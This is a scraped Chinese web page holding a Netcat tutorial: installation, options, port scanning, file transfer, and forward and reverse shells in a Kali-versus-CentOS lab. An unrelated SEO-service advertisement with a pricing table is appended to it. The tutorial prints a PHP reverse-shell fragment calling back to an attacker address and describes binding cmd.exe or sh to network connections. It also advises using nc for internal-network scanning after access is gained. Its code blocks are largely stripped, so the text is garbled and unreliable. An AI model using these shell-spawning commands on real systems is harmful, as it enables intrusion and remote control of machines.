Products
96SEO 2026-02-19 12:42 7
Netcat安装与使用1.Netcat简介1.1.Netcat安装1.1.1.安装整体流程1.1.1.1.安装依赖1.1.1.2.安装Netcat1.1.1.3.配置环境变量1.1.1.4.测试1.2.Netcat基本功能1.3.Netcat常用参数2.Netcat用法2.1.前期准备2.2.banner相关信息抓取2.3.端口扫描2.3.1.扫描指定端口2.3.2.扫描指定端口段2.4.监听端口2.5.文件传输2.5.1.监听2.5.2.发送2.6.简易聊天2.7.获取shell2.7.1.正向获取shell2.7.1.1.攻击者2.7.1.2.攻击者2.7.2.反向获取shell2.7.2.1.攻击者2.7.2.2.受害者2.8.其它获取shell2.8.1.PHP反弹shell2.8.1.1.生成反弹命令2.8.1.2.攻击者2.8.1.3.受害者1.Netcat简介
是一款简单的Unix工具使用UDP和TCP协议被称为网络工具中的瑞士军*刀。
它是一个可靠的容易被其他程序所启用的后台操作工具同时它也被用作网络的测试工具或黑客工具。
在Linux中都是自带Netcat的如果没有可以使用命令进行安装安装完可以查看一下版本。
https://sourceforge.NET/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz
NETCAT_HOME/usr/local/netcat-0.7.1
PATH$PATH:$NETCAT_HOME/bin1.1.1.4.测试
-v当然也可以使用netcat其实是因为我懒懒得卸载重新配置。
telnet/获取系统bannet信息、传输文本信息、传输文件和目录、加密传输文件、端口扫描、远程控制、正方向shell等。
Netcat它有许多参数可供使用以下是一些常用的Netcat参数可以根据自己的需要选择使用同时Netcat还有其他更多的参数你可以通过查看其官方文档来了解。
参数介绍-h查看帮助信息。
-l监听模式等待其他计算机连接。
-p指定监听的端口号。
-u使用UDP协议。
-v输出详细信息如建立连接时显示IP地址和端口号。
-n不使用DNS查找使用IP地址进行连接。
-z将输入/输出功能关闭进行端口扫描。
-s指定本地的IP地址。
-e在连接建立后将标准输入和输出重定向到一个指定的程序或脚本中。
-w设置超时时间等待连接或数据的时间。
-c发送指定字节数的数据后关闭连接。
-i设置发送数据的时间间隔。
-q设置程序退出前的最大延迟时间。
-k启用TCP保持活动状态。
-r设置随机本地端口号。
-t以telnet形式应答。
v参数就是列出执行过程的详细信息n参数就只接收IP地址没有dns之所以使用n参数是因为使用命令的过程中只去传入IP减少了nc把域名解析为IP的过程这样可以节省时间提高效率。
如果想要单纯的端口扫描的话使用其它工具比如nmap会更好而使用nc的主要用途就是在内网获取到权限后再使用nc对内网进行扫描。
nmap无法扫描内网。
使用nc更多的是对内网扫描若初期就需要端口扫描的话不建议使用nc。
监听本地端口当访问该端口时会输出该信息到命令行这里我使用一个云服务器来监听。
首先在kali上开启监听然后在centos7中发送文件当发送文件后kali上监听到后就可以将文件保存下来。
这里不单单可以发送文件像压缩包、目录等均可以传输不过这里需要理解两个重定向符号
这里设置kali监听简单来说就是接收文件并将文件保存到1.txt中。
这里设置centos7为发送将当前目录下的2.txt发送至kail。
可以在两台机器之间相互传递信息首先需要有一台机器进行监听一个端口另一台以连接的方式去连接其指定的端口这样两台机器之间建立了通信后相互之间可以传输信息。
正向获取shell就是将centos7连接kalicentos7获取kali的shell权限。
简单来说就是受害者获取攻击者的shell。
这里不使用Windows测试只是将Windows系统的命令使用介绍一下。
c:\windows\system32\cmd.exe2.7.1.2.攻击者
客户端连接服务器服务器获取客户端的shell。
通常用在开启防护措施的目标机如防火墙过滤、端口转发的等。
通常反向shell是最常用的。
c:\windows\system32\cmd.exe2.8.其它获取shell
这里其它获取shell就是通过不同的方式进行shell的反弹。
这里可以使用反弹shell命令一键生成官网进行测试。
$sockfsockopen(192.168.10.20,7777);sh
这里的受害者就是centos7按照官网上的生成的命令进行配置我这里centos7上没有php所以没成功正常情况下是能够成功的这里我主要就是演示一下。
$sockfsockopen(192.168.10.20,7777);sh
作为专业的SEO优化服务提供商,我们致力于通过科学、系统的搜索引擎优化策略,帮助企业在百度、Google等搜索引擎中获得更高的排名和流量。我们的服务涵盖网站结构优化、内容优化、技术SEO和链接建设等多个维度。
| 服务项目 | 基础套餐 | 标准套餐 | 高级定制 |
|---|---|---|---|
| 关键词优化数量 | 10-20个核心词 | 30-50个核心词+长尾词 | 80-150个全方位覆盖 |
| 内容优化 | 基础页面优化 | 全站内容优化+每月5篇原创 | 个性化内容策略+每月15篇原创 |
| 技术SEO | 基本技术检查 | 全面技术优化+移动适配 | 深度技术重构+性能优化 |
| 外链建设 | 每月5-10条 | 每月20-30条高质量外链 | 每月50+条多渠道外链 |
| 数据报告 | 月度基础报告 | 双周详细报告+分析 | 每周深度报告+策略调整 |
| 效果保障 | 3-6个月见效 | 2-4个月见效 | 1-3个月快速见效 |
我们的SEO优化服务遵循科学严谨的流程,确保每一步都基于数据分析和行业最佳实践:
全面检测网站技术问题、内容质量、竞争对手情况,制定个性化优化方案。
基于用户搜索意图和商业目标,制定全面的关键词矩阵和布局策略。
解决网站技术问题,优化网站结构,提升页面速度和移动端体验。
创作高质量原创内容,优化现有页面,建立内容更新机制。
获取高质量外部链接,建立品牌在线影响力,提升网站权威度。
持续监控排名、流量和转化数据,根据效果调整优化策略。
基于我们服务的客户数据统计,平均优化效果如下:
我们坚信,真正的SEO优化不仅仅是追求排名,而是通过提供优质内容、优化用户体验、建立网站权威,最终实现可持续的业务增长。我们的目标是与客户建立长期合作关系,共同成长。
Demand feedback
